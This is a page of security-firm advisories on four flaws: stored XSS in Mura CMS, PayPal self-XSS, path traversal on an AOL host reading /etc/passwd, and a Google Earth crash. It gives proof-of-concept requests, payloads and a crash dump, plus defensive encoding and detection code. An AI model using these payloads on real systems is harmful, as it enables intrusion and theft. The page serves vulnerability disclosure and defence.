Advisories 2017

2017-001: BlueRiver Mura CMS vulnerable to Stored Cross Site Scripting Attacks via rb parameter.
2017-002: Paypal(dot)com self-XSS Vulnerability
2017-003: My AOL | Today's News vulnerable to Path Traversal
2017-010: Google Earth 'QtWebKit4' NULL Pointer Dereference Vulnerability

2017-001: BlueRiver Mura CMS vulnerable to Stored Cross Site Scripting Attacks via rb parameter.

Original release date: May 30, 2017
Last revised: May 30, 2017
Discovered by: José Carlos Expósito Bueno
Severity: 7.5 CVSSv2 (AV:N/AC:L/Au:N/C:P/I:P/A:P)

BACKGROUND

Mura CMS is an open source content management system for CFML, created by Blue River Interactive Group.
Mura has been designed to be used by marketing departments, web designers and developers, and it is widely used by major companies and organizations around the world, including NATO, NASA, GSA, the European Commission, Intel, P&G, the U.S. FDA, the U.S. Social Security Administration, the U.S. Senate, the U.S. Navy, the U.S. Department of Health and Human Services, the U.S. Department of Homeland Security, Schneider, First Hawaiian Bank, Boeing, Baylor College of Medicine and Michigan State University.

DESCRIPTION

BlueRiver Mura CMS is vulnerable to stored cross-site scripting via the rb parameter.
The value supplied in the rb query string parameter is persisted by the application and later written, without escaping, into a single-quoted JavaScript string literal (var rb='...';) in the administration login page. A value such as x';alert(document.domain);// therefore closes the literal, injects a statement and comments out the rest of the line. The injected script executes every time a user visits the Mura CMS administration login page.

PROOF OF CONCEPT

########################################
### Stored XSS Request
########################################
GET /path/admin/index.cfm?rb=x%27;alert(document.domain);// HTTP/1.1
Host: vulnerable.host.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: s_vi=[CS]v1|2C5FE38B85311092-6000010DC0007122[CE]; AMCV_9E1005A551ED61CA0A490D45%40AdobeOrg=1099438348%7CMCAID%7C2C5FE38B85311092-6000010DC0007122%7CMCIDTS%7C17313%7CMCMID%7C85409179856262413853165277697928813021%7CMCAAMLH-1496404669%7C6%7CMCAAMB-1496404669%7CNRX38WO0n5BH8Th-nqAG_A%7CMCOPTOUT-1495807069s%7CNONE%7CMCSYNCSOP%7C411-17320%7CvVersion%7C2.1.0; s_pers=%20cpn%3D%7C1653566268691%3B%20ppn%3Dadobe.com%7C1653566268694%3B%20s_amov%3D1%7C1495801669949%3B%20s_fid%3D372E39AA61EA3FA1-198193CA03B92617%7C1559063139263%3B%20s_vs%3D1%7C1495992939272%3B%20gpv%3Dcoldfusion.adobe.com%253Acoldfusion%253Aindex.cfm%253Ablog%7C1495992939278%3B%20s_nr%3D1495991139283-Repeat%7C1527527139283%3B; mbox=session#8092c2d4c21445d6809d0ebd62c80c34#1495801734|PC#8092c2d4c21445d6809d0ebd62c80c34.26_15#1559044671; georouting_presented=true; __CT_Data=gpv=1&apv_100_www20=1&cpv_100_www20=1&rpv_100_www20=1; aam_uuid=85612095538239441673145124797129108819; WRUIDAWS=1240751761843931; CFID=456409; CFTOKEN=e412f04e7813ca1-4149DA5A-5056-A56D-8CE03E8CA1EFA11D; ORIGINALURLTOKEN=9FFF7F6A%2D70C2%2D421D%2DA2013073200D197F; MOBILEFORMAT=false; rb=""; sfdc_session=-; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D0%3B%20s_sq%3D%3B%20s_ppv%3D-%252C29%252C29%252C671%3B; aam_uuid=85612095538239441673145124797129108819; s_fid=6DEA32486AB53A9B-168353046F737537; s_cc=true
Connection: close
Upgrade-Insecure-Requests: 1

########################################
### Response and Redirect to Stored XSS
########################################
HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Location: ./?muraAction=clogin.main
Server: Microsoft-IIS/8.0
Generator: Mura CMS
X-Powered-By: ASP.NET
Date: Mon, 29 May 2017 08:31:36 GMT
Connection: close
Content-Length: 0

########################################
### Redirect Request
########################################
GET /path/admin/?muraAction=clogin.main HTTP/1.1
Host: vulnerable.host.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: s_vi=[CS]v1|2C5FE38B85311092-6000010DC0007122[CE]; AMCV_9E1005A551ED61CA0A490D45%40AdobeOrg=1099438348%7CMCAID%7C2C5FE38B85311092-6000010DC0007122%7CMCIDTS%7C17313%7CMCMID%7C85409179856262413853165277697928813021%7CMCAAMLH-1496404669%7C6%7CMCAAMB-1496404669%7CNRX38WO0n5BH8Th-nqAG_A%7CMCOPTOUT-1495807069s%7CNONE%7CMCSYNCSOP%7C411-17320%7CvVersion%7C2.1.0; s_pers=%20cpn%3D%7C1653566268691%3B%20ppn%3Dadobe.com%7C1653566268694%3B%20s_amov%3D1%7C1495801669949%3B%20s_fid%3D372E39AA61EA3FA1-198193CA03B92617%7C1559063139263%3B%20s_vs%3D1%7C1495992939272%3B%20gpv%3Dcoldfusion.adobe.com%253Acoldfusion%253Aindex.cfm%253Ablog%7C1495992939278%3B%20s_nr%3D1495991139283-Repeat%7C1527527139283%3B; mbox=session#8092c2d4c21445d6809d0ebd62c80c34#1495801734|PC#8092c2d4c21445d6809d0ebd62c80c34.26_15#1559044671; georouting_presented=true; __CT_Data=gpv=1&apv_100_www20=1&cpv_100_www20=1&rpv_100_www20=1; aam_uuid=85612095538239441673145124797129108819; WRUIDAWS=1240751761843931; CFID=456409; CFTOKEN=e412f04e7813ca1-4149DA5A-5056-A56D-8CE03E8CA1EFA11D; ORIGINALURLTOKEN=9FFF7F6A%2D70C2%2D421D%2DA2013073200D197F; MOBILEFORMAT=false; rb=""; sfdc_session=-; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D0%3B%20s_sq%3D%3B%20s_ppv%3D-%252C29%252C29%252C671%3B; aam_uuid=85612095538239441673145124797129108819; s_fid=6DEA32486AB53A9B-168353046F737537; s_cc=true
Connection: close
Upgrade-Insecure-Requests: 1


########################################
### Redirect Response with Stored XSS
########################################
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Expires: 06 Nov 1994 08:37:34 GMT
Server: Microsoft-IIS/8.0
Generator: Mura CMS
X-Powered-By: ASP.NET
Date: Mon, 29 May 2017 08:31:46 GMT
Connection: close

<!DOCTYPE html>
[...SNIP...]
<!-- Mura Vars -->
<script type="text/javascript">
var htmlEditorType='';
var context='/path';
var themepath='/path/default/includes/themes/CleanCanvasWrap';
var rb='x';alert(document.domain);//';
var siteid='default';
var sessionTimeout=10800;
var activepanel=0;
var activetab=0;
var webroot='C:\\inetpub\\wwwroot';
var fileDelim='\\';
</script>
[...SNIP...]
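
The sink shown in the response above is a JavaScript string literal, so the correct fix is JavaScript-string encoding of the rb value rather than HTML encoding. The following is an added example written for this page, not Mura CMS or Blue River code: it reproduces the var rb='...'; line, runs the emitted script with a stubbed alert() to show the break-out, and shows a context-correct encoder. The function names, the stand-in document object and the use of JSON.stringify are the example's own choices; in the CFML code base the equivalent primitive is ColdFusion's encodeForJavaScript().

```javascript
// Added example (not Mura CMS code): the rb value from the advisory ends up inside
// a single-quoted JavaScript string literal in the admin login page. Names below
// are illustrative assumptions, not Mura's own.

// Vulnerable sink, mirroring the `var rb='...';` line in the advisory's response:
// the value is interpolated verbatim into a single-quoted JS string literal.
function renderVulnerable(rb) {
  return `var rb='${rb}';`;
}

// Hardened sink: build the literal with JSON.stringify (escapes quotes, backslashes
// and control characters), then additionally escape <, >, & and the U+2028/U+2029
// line terminators so the value can neither close the enclosing <script> element
// nor break the JS lexer. Encode for the JavaScript-string context, not the HTML one.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function renderHardened(rb) {
  return `var rb=${jsStringLiteral(rb)};`;
}

// Execute the emitted script with a stubbed alert() and a constructed stand-in for
// the page's document object, then report what rb holds and whether injected code ran.
// The script is wrapped in a function so its `var rb` is local and can be read back.
function execute(script) {
  let alertCalls = 0;
  const alert = () => { alertCalls += 1; };
  const document = { domain: 'vulnerable.host.com' }; // constructed, not a real page
  const rb = new Function('alert', 'document', `${script}\nreturn rb;`)(alert, document);
  return { rb, alertCalls };
}

// Payload from the advisory, after URL decoding of x%27;alert(document.domain);//
const MURA_PAYLOAD = "x';alert(document.domain);//";

console.log('vulnerable:', renderVulnerable(MURA_PAYLOAD), execute(renderVulnerable(MURA_PAYLOAD)));
console.log('hardened:  ', renderHardened(MURA_PAYLOAD), execute(renderHardened(MURA_PAYLOAD)));
```

With the vulnerable sink the emitted script assigns rb='x' and then runs the injected alert; with the hardened sink rb holds the full attacker string as data and nothing else executes, and a value containing </script> cannot terminate the script element either.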

BUSINESS IMPACT

An attacker can execute arbitrary HTML or script code in a targeted user's browser, which can be leveraged to steal sensitive information such as user credentials or personal data. Because the payload fires on the administration login page, administrators are the natural targets.

SYSTEMS AFFECTED

This vulnerability was verified in BlueRiver Mura CMS 6.1 running under Adobe ColdFusion.

SOLUTION

Update to the latest Mura CMS 6.1 release; the vendor reports that this issue is already patched there (see DISCLOSURE TIMELINE).

REFERENCES

Consult these external references for further information:

  • BlueRiver | Mura

   http://www.getmura.com/

  • OWASP | XSS

   https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29

  • CWE | CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

   https://cwe.mitre.org/data/definitions/79.html

CREDITS

This vulnerability has been discovered by José Carlos Expósito Bueno (jcexposito (at) isecauditors (dot) com).

REVISION HISTORY

May 30, 2017: Initial release

DISCLOSURE TIMELINE

May 29, 2017 : Vulnerability acquired by Internet Security Auditors (www.isecauditors.com)
May 30, 2017 : Contact with vendor (Blue River Interactive Group)
June 2, 2017 : Vendor Response/Feedback: this issue has been patched already in the latest 6.1 version

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain-based leader in web application testing, network security, penetration testing, and security compliance implementation and assessment. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are a vendor-independent provider with deep expertise since 2001. Our R&D efforts include vulnerability research, collaboration on open security projects, whitepapers and presentations, and participation in and promotion of security events. For further information regarding our security services, contact us.

2017-002: Paypal(dot)com self-XSS Vulnerability

Original release date: February 25, 2017
Last revised: February 27, 2017
Discovered by: Fabián Cuchietti
Severity: 2/5 (CVSSv3 Base Metrics)

BACKGROUND

PayPal Holdings, Inc. is an American company operating a worldwide online payments system that supports online money transfers and serves as an electronic alternative to traditional paper methods like checks and money orders.

DESCRIPTION

Paypal (dot) com is affected by a self cross-site scripting (self-XSS) vulnerability in the "Reminder Note" (memo) field of a payment format. The vulnerable resource does not properly validate the parameters passed to the application through POST requests, which allows a user to bypass the input sanitizer; the stored value is then rendered without adequate output encoding, so arbitrary HTML/script code executes in the context of the browser that views it. Because the payload is entered through the account's own settings, exploitation requires convincing the victim to submit the payload themselves.

PROOF OF CONCEPT

1) Sign in to your paypal account

2) Go to category: Tools > Forms of Payment

3) Click on Create a new payment format

4) Complete the form and click Submit

5) Go to: Manage payment formats > Edit the created payment format >

6) Memo or "Reminder Note" > Edit > Insert the payload here, e.g. "><img src=x onerror=prompt(document.domain)> > Click Save

7) The XSS will be executed successfully.
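
The payload in step 6 opens with "> so that it closes a double-quoted attribute value and starts a new element, and it carries no <script> tag, which is how it slips past a blocklist-style sanitizer. The following is an added example written for this page, not PayPal code: the form markup, the blocklist "sanitizer" and the function names are assumptions chosen to illustrate the failure, and the hardened version shows the context-correct fix (attribute encoding on output).

```javascript
// Added example (not PayPal's code): why a blocklist sanitizer fails against the
// memo payload and how attribute-context output encoding stops it. The markup and
// names here are illustrative assumptions.

// A blocklist sanitizer of the kind the advisory says can be bypassed: it strips
// <script> elements and nothing else, so an <img onerror=...> passes untouched.
function naiveSanitize(memo) {
  return memo.replace(/<script\b[^>]*>[\s\S]*?<\/script>/gi, '');
}

// Vulnerable rendering: the "sanitized" value is dropped into a double-quoted attribute.
function renderMemoVulnerable(memo) {
  return `<input type="text" name="memo" value="${naiveSanitize(memo)}">`;
}

// Hardened rendering: encode for the HTML attribute context. Every character that can
// end the attribute value or start a tag or entity is replaced, so the stored text
// cannot leave the attribute whatever it contains. No blocklist is needed.
function htmlAttrEncode(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;', '`': '&#96;' };
  return String(value).replace(/[&<>"'`]/g, (c) => map[c]);
}

function renderMemoHardened(memo) {
  return `<input type="text" name="memo" value="${htmlAttrEncode(memo)}">`;
}

// Minimal check used in place of a full HTML parser: list the start tags in the
// rendered markup. Text that stays inside the attribute never creates a second element.
function startTags(html) {
  return Array.from(html.matchAll(/<([a-zA-Z][\w:-]*)/g), (m) => m[1].toLowerCase());
}

// Payload from step 6 of the advisory, with the onerror handler written as one token.
const MEMO_PAYLOAD = '"><img src=x onerror=prompt(document.domain)>';

console.log(renderMemoVulnerable(MEMO_PAYLOAD), startTags(renderMemoVulnerable(MEMO_PAYLOAD)));
console.log(renderMemoHardened(MEMO_PAYLOAD), startTags(renderMemoHardened(MEMO_PAYLOAD)));
```

The vulnerable rendering yields two elements (input and img) from one field; the hardened rendering yields only the input, with the payload visible as inert text in its value attribute.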

BUSINESS IMPACT

An attacker can execute arbitrary HTML or script code in a targeted user's browser, which can be leveraged to steal sensitive information such as user credentials or personal data. As this is a self-XSS, the payload has to be entered into the victim's own account, so the attack depends on social engineering.

SYSTEMS AFFECTED

https://www.paypal.com/

SOLUTION

-

REFERENCES

http://www.isecauditors.com
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

CREDITS

This vulnerability has been discovered by Oscar Fabián Cuchietti (ofcuchietti (at) isecauditors (dot) com).

REVISION HISTORY

February 25, 2017   Initial release

DISCLOSURE TIMELINE

February 25, 2017   Vulnerability acquired by Internet Security Auditors (www.isecauditors.com)
February 25, 2017   Contact with Paypal Security Team
February 27, 2017   Vendor Response/Feedback
February 27, 2017   Advisory published.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain-based leader in web application testing, network security, penetration testing, and security compliance implementation and assessment. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are a vendor-independent provider with deep expertise since 2001. Our R&D efforts include vulnerability research, collaboration on open security projects, whitepapers and presentations, and participation in and promotion of security events. For further information regarding our security services, contact us.

2017-003: My AOL | Today's News vulnerable to Path Traversal

Original release date: June 26, 2017
Last revised: June 26, 2017
Discovered by: Jose Carlos Exposito Bueno
Severity: 7.8 CVSSv2 (AV:N/AC:L/Au:N/C:C/I:N/A:N)

BACKGROUND

AOL Inc. (simply known as AOL, originally known as America Online) is a web portal and online service provider based in New York, a subsidiary of Verizon Communications and part of Oath. AOL was one of the early pioneers of the Internet in the mid-1990s and the most recognized brand on the web in the U.S. It originally provided a dial-up service to millions of Americans, as well as a web portal, e-mail, instant messaging and, following its purchase of Netscape, a web browser.

DESCRIPTION

"alertswp.aol.com" is vulnerable to path traversal: an unauthenticated remote user can read arbitrary files from the server's file system by supplying "../" sequences in the request path. In the proof of concept the slash is percent-encoded ("..%2f"), a common variant that typically survives normalization of the raw request path and is only decoded when the back end resolves the file.

PROOF OF CONCEPT

http://alertswp.aol.com/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
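
A server-side check that catches the request above has to decode before it normalizes, and must treat "..%2f" and double-encoded forms such as "%252e%252e" the same as a literal "../". The following is an added example written for this page, not AOL code: it resolves a request path against a web root with explicit segment handling and includes a detector for access-log lines. The web root, the function names and the log lines are constructed for the example.

```javascript
// Added example (not AOL's code): decode-then-normalize path check that rejects the
// PoC request, plus a log detector. Root path and sample log lines are constructed.

// Decode repeatedly until the string stops changing (bounded), so %2f, %252f and
// similar forms all collapse to their final shape before any check is applied.
// Returns null for malformed escapes or for input still changing after maxRounds.
function fullyDecode(s, maxRounds = 3) {
  let cur = s;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(cur); } catch (e) { return null; }
    if (next === cur) return cur;
    cur = next;
  }
  return null;
}

// Resolve a request path under a web root segment by segment: '.' and empty segments
// are dropped, '..' pops a segment, and a backslash counts as a separator. Returns
// the canonical path, or null when the request tries to climb above the root.
function resolveUnderRoot(root, requestPath) {
  const decoded = fullyDecode(requestPath);
  if (decoded === null || decoded.includes('\0')) return null;
  const out = [];
  for (const seg of decoded.split(/[\/\\]+/)) {
    if (seg === '' || seg === '.') continue;
    if (seg === '..') {
      if (out.length === 0) return null; // would escape the root
      out.pop();
      continue;
    }
    out.push(seg);
  }
  return out.length ? `${root}/${out.join('/')}` : root;
}

// Detector: flag any request whose fully decoded path contains a '..' segment,
// which is the signature of the PoC regardless of how the dots or slash are encoded.
function isTraversalAttempt(rawPath) {
  const decoded = fullyDecode(rawPath);
  if (decoded === null) return true; // undecodable or over-encoded: worth a look
  return decoded.split(/[\/\\]+/).includes('..');
}

// Constructed access-log lines in common log format (not real AOL logs). The first
// reproduces the PoC request from this advisory.
const SAMPLE_LOG = [
  '203.0.113.7 - - [26/Jun/2017:10:01:02 +0000] "GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1432',
  '203.0.113.7 - - [26/Jun/2017:10:01:05 +0000] "GET /%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 404 0',
  '198.51.100.4 - - [26/Jun/2017:10:02:11 +0000] "GET /news/today.html HTTP/1.1" 200 8810',
];

// Pull the request path out of each log line and keep the ones that look like traversal.
function flaggedPaths(logLines) {
  return logLines
    .map((line) => (line.match(/"(?:GET|POST|HEAD) (\S+) HTTP/) || [])[1])
    .filter((p) => p && isTraversalAttempt(p));
}

const WEB_ROOT = '/var/www/html'; // constructed for the example
console.log(resolveUnderRoot(WEB_ROOT, '/..%2f..%2f..%2fetc%2fpasswd'));
console.log(resolveUnderRoot(WEB_ROOT, '/news/today.html'));
console.log(flaggedPaths(SAMPLE_LOG));
```

The important design choice is the order of operations: normalizing before decoding is what lets "..%2f" through, and decoding only once is what lets "%252e%252e" through. Rejecting a request that climbs above the root, rather than silently clamping it, also gives the detector a clean signal.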

BUSINESS IMPACT

An attacker can access files and directories that are stored outside the web root folder. By manipulating variables that reference files with "dot-dot-slash (../)" sequences and their variations, or by using absolute file paths, it may be possible to read arbitrary files and directories stored on the file system, including application source code, configuration files and critical system files.

SYSTEMS AFFECTED

Current "alertswp.aol.com" Portal site.

SOLUTION

-

REFERENCES

https://www.owasp.org/index.php/Path_Traversal

CREDITS

This vulnerability has been discovered by José Carlos Expósito Bueno (jcexposito (at) isecauditors (dot) com).

REVISION HISTORY

June 26, 2017 : Initial release

DISCLOSURE TIMELINE

June 26, 2017 : Vulnerability acquired by Internet Security Auditors (www.isecauditors.com)
June 26, 2017 : Advisory communicated to AOL security team

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain-based leader in web application testing, network security, penetration testing, and security compliance implementation and assessment. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are a vendor-independent provider with deep expertise since 2001. Our R&D efforts include vulnerability research, collaboration on open security projects, whitepapers and presentations, and participation in and promotion of security events. For further information regarding our security services, contact us.

2017-010: Google Earth 'QtWebKit4' NULL Pointer Dereference Vulnerability

Original release date: January 20, 2016
Last revised: January 20, 2016
Discovered by: Fabián Cuchietti
Severity: 4/5

BACKGROUND

Google Earth is a virtual globe, map and geographical information program, originally called EarthViewer 3D, created by Keyhole, Inc., a Central Intelligence Agency (CIA)-funded company acquired by Google in 2004.

DESCRIPTION

NULL pointer dereference errors are common in C/C++ programs. A pointer is a data type that references a location in memory; reading from or writing to that location, or calling through it, dereferences the pointer. The weakness (CWE-476) occurs when an application dereferences a pointer that is expected to hold a valid address but is NULL. In the crash dump below the faulting instruction pointer is 0x00000000 and the failure bucket is SOFTWARE_NX_FAULT_NULL: QtWebKit4.dll (QtWebKit4+0x89cde) makes an indirect call through a NULL function pointer, and DEP refuses to execute from the unmapped null page, so Google Earth crashes while rendering the folder description.

PROOF OF CONCEPT

1) Open Google Earth

2) My Places

3) Right click> Add> Folder

4) Select a name for your folder

5) Description: Here we insert our payload > OK

{Payload: <script type="text/javascript">
    // Polyfill: String.prototype.repeat is an ES2015 method and may be
    // absent from the embedded QtWebKit engine.
    String.prototype.repeat = function( num )
    {return new Array( num + 1 ).join( this );}
    var i=0;
    // Random number spliced into the middle of the "-moz-binding" property
    // name below (giving e.g. "-moz-b12345inding"), so each run emits a
    // slightly different, invalid style property.
    var r=Math.floor(Math.random()*99999)*9*8*9*9*9*9*9*9*9/9*9;
    // The character codes decode to one element of markup:
    //   <xht:acronym style="font:100000% fixedsys; style="xss:expression(alert(1))"  -moz-b{r}inding:url(#11); font-family:fixedsys;">1 1</xht:acronym>
    var bib=String.fromCharCode(60, 120, 104, 116, 58, 97, 99, 114,
    111, 110, 121, 109, 32, 115, 116, 121, 108, 101, 61, 34, 102, 111,
    110, 116, 58, 49, 48, 48, 48, 48, 48, 37, 32, 102, 105, 120, 101, 100,
    115, 121, 115, 59, 32, 115, 116, 121, 108, 101, 61, 34, 120, 115, 115,
    58, 101, 120, 112, 114, 101, 115, 115, 105, 111, 110, 40, 97, 108, 101,
    114, 116, 40, 49, 41, 41, 34, 32, 32, 45, 109, 111, 122,
    45, 98)+r+String.fromCharCode(105, 110, 100, 105, 110, 103, 58, 117,
    114, 108, 40, 35, 49, 49, 41, 59, 32, 102, 111, 110, 116, 45, 102, 97,
    109, 105, 108, 121, 58, 102, 105, 120, 101, 100, 115, 121, 115, 59, 34,
    62, 49, 32, 49, 60, 47, 120, 104, 116, 58, 97, 99, 114, 111, 110, 121, 109,
    62, 10);
    // Write roughly ten million copies of that element (with a 100000% font
    // size) into the document; the crash in QtWebKit4.dll recorded in the
    // DUMP below follows.
    document.write(bib.repeat(9999999));
   </script> }
  
6) Click the folder created with the payload



DUMP:

FAULTING_IP:
+89cde
00000000 ??              ???

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 00000000
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000008
   Parameter[1]: 00000000
Attempt to execute non-executable address 00000000

PROCESS_NAME:  googleearth.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at "0x%08lx" referenced memory at "0x%08lx". The memory could not be "%s".

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at "0x%08lx" referenced memory at "0x%08lx". The memory could not be "%s".

EXCEPTION_PARAMETER1:  00000008

EXCEPTION_PARAMETER2:  00000000

WRITE_ADDRESS:  00000000

FOLLOWUP_IP:
QtWebKit4+89cde
5c9f9cde ??              ???

FAILED_INSTRUCTION_ADDRESS:
+89cde
00000000 ??              ???

FAULTING_THREAD:  00001044

BUGCHECK_STR:  APPLICATION_FAULT_SOFTWARE_NX_FAULT_NULL

PRIMARY_PROBLEM_CLASS:  SOFTWARE_NX_FAULT_NULL

DEFAULT_BUCKET_ID:  SOFTWARE_NX_FAULT_NULL

LAST_CONTROL_TRANSFER:  from 5c9f9cde to 00000000

STACK_TEXT: 
WARNING: Frame IP not in any known module. Following frames may be wrong.
002cafb8 5c9f9cde 002cb05c 5c9b74f1 5e9c7916 0x0
002cafbc 002cb05c 5c9b74f1 5e9c7916 00000000 QtWebKit4+0x89cde
002cafc0 5c9b74f1 5e9c7916 00000000 00000000 0x2cb05c
002cb05c 00000000 00000000 00000000 00000000 QtWebKit4+0x474f1


STACK_COMMAND:  ~0s; .ecxr ; kb

SYMBOL_STACK_INDEX:  1

SYMBOL_NAME:  qtwebkit4+89cde

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: QtWebKit4

IMAGE_NAME:  QtWebKit4.dll

DEBUG_FLR_IMAGE_TIMESTAMP:  4e010a08

FAILURE_BUCKET_ID:  SOFTWARE_NX_FAULT_NULL_c0000005_QtWebKit4.dll!Unknown

BUSINESS IMPACT

In most cases NULL pointer dereference errors only crash the application; remote code execution is possible under certain circumstances, typically when an attacker can control what the NULL pointer is resolved against. Here the dump records a control transfer to address 0x00000000 that DEP blocks, so the demonstrated impact is a client-side denial of service: Google Earth crashes whenever the folder containing the description is opened. Depending on the privileges of the application, this weakness can result in a denial of service against the entire system or can be used to gain complete control over it.

SYSTEMS AFFECTED

https://www.google.com/earth/

SOLUTION

-

REFERENCES

http://www.isecauditors.com
https://www.owasp.org/index.php/Null-pointer_dereference
http://cwe.mitre.org/data/definitions/476.html

CREDITS

This vulnerability has been discovered by Oscar Fabián Cuchietti (ofcuchietti (at) isecauditors (dot) com).

REVISION HISTORY

December 13, 2015 Initial release

DISCLOSURE TIMELINE

December 13, 2015   Vulnerability acquired by Internet Security Auditors (www.isecauditors.com)
December 13, 2015   Contact with Google Security Team
December 14, 2015   Vendor Response/Feedback
January  20, 2016   Advisory published.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain-based leader in web application testing, network security, penetration testing, and security compliance implementation and assessment. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are a vendor-independent provider with deep expertise since 2001. Our R&D efforts include vulnerability research, collaboration on open security projects, whitepapers and presentations, and participation in and promotion of security events. For further information regarding our security services, contact us.